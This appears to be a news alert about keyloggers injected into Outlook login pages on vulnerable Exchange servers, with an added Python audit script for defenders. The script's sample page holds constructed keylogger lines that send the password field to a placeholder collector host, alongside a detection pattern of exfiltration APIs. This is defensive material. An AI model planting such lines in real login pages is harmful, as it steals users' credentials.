Cybersecurity Alert: Hackers Target 65 Microsoft Exchange Servers Worldwide

In a disturbing new trend, hackers have been observed targeting Microsoft Exchange servers, exploiting vulnerabilities to inject malicious code that harvests user credentials. A recent report by Positive Technologies revealed that 65 victims across 26 countries have fallen prey to such attacks, continuing a campaign first documented in May 2024.

The cybercriminals are utilizing two distinct types of JavaScript keyloggers on the Outlook login pages. One variant saves stolen data to a file accessible via the internet, while the other transmits credentials to external servers. The impact of these attacks has been widespread, with victims including government agencies, banks, IT firms, and educational institutions.
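For defenders, the two variants described above leave the same kind of trace in the served login page: script that reads the password field and hands it to a network API. The following audit heuristic is an added example, not code from the Positive Technologies report; the host names, paths, field names and the sample page are constructed placeholders, and `audit` and `LoginPageAudit` are hypothetical names.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Browser APIs a credential-harvesting script needs to move data off the page.
SINKS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|WebSocket)\b|new\s+Image\b")
URLS = re.compile(r"""https?://[^\s'"<>)]+""")

class LoginPageAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.password_ids, self.script_srcs, self.inline = set(), [], []
        self._in_script = False
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_ids.update(v for v in (a.get("id"), a.get("name")) if v)
        elif tag == "script" and a.get("src"):
            self.script_srcs.append(a["src"])
        elif tag == "script":
            self._in_script = True
            self.inline.append("")
    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def audit(html, own_host):
    """Return (kind, detail) findings for scripts that could exfiltrate the password field."""
    page = LoginPageAudit()
    page.feed(html)
    page.close()
    findings = [("external-script", s) for s in page.script_srcs
                if urlparse(s).hostname not in (None, own_host)]
    for code in page.inline:
        reads_pw = any(re.search(r"\b%s\b" % re.escape(i), code) for i in page.password_ids)
        if reads_pw and SINKS.search(code):
            off = [u for u in URLS.findall(code) if urlparse(u).hostname != own_host]
            findings.append(("offsite-send", off[0]) if off else ("local-send", None))
    return findings

# Constructed sample page: placeholder hosts and paths, not taken from any real server.
SAMPLE = """<form action="/login" method="POST"><input id="username" name="username">
<input id="password" name="password" type="password"></form>
<script src="/static/ui.js"></script>
<script>var p = document.getElementById("password").value;
fetch("https://collector.example.invalid/c", {method: "POST", body: p});</script>
<script>var x = new XMLHttpRequest(); x.open("POST", "/placeholder/handler");
x.send(document.getElementById("password").value);</script>"""
```

A finding is a prompt to compare the served page with a known-good copy from the installation media, not proof of compromise, since legitimate login scripts can also touch these APIs.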

Researchers identified numerous vulnerabilities being exploited, including the notorious ProxyShell flaws and the ProxyLogon flaws (CVE-2021-26855, CVE-2021-27065), among others. Embedding the code in the legitimate login page allows the attackers to remain undetected while collecting sensitive information.

Despite these risks, many Microsoft Exchange servers still exposed to the internet remain unpatched. The alarming trend fits into a broader pattern of cyberattacks targeting entities in regions such as Africa and the Middle East, raising urgent questions about cybersecurity defenses globally. As threats like these proliferate, the need for robust security measures becomes increasingly critical.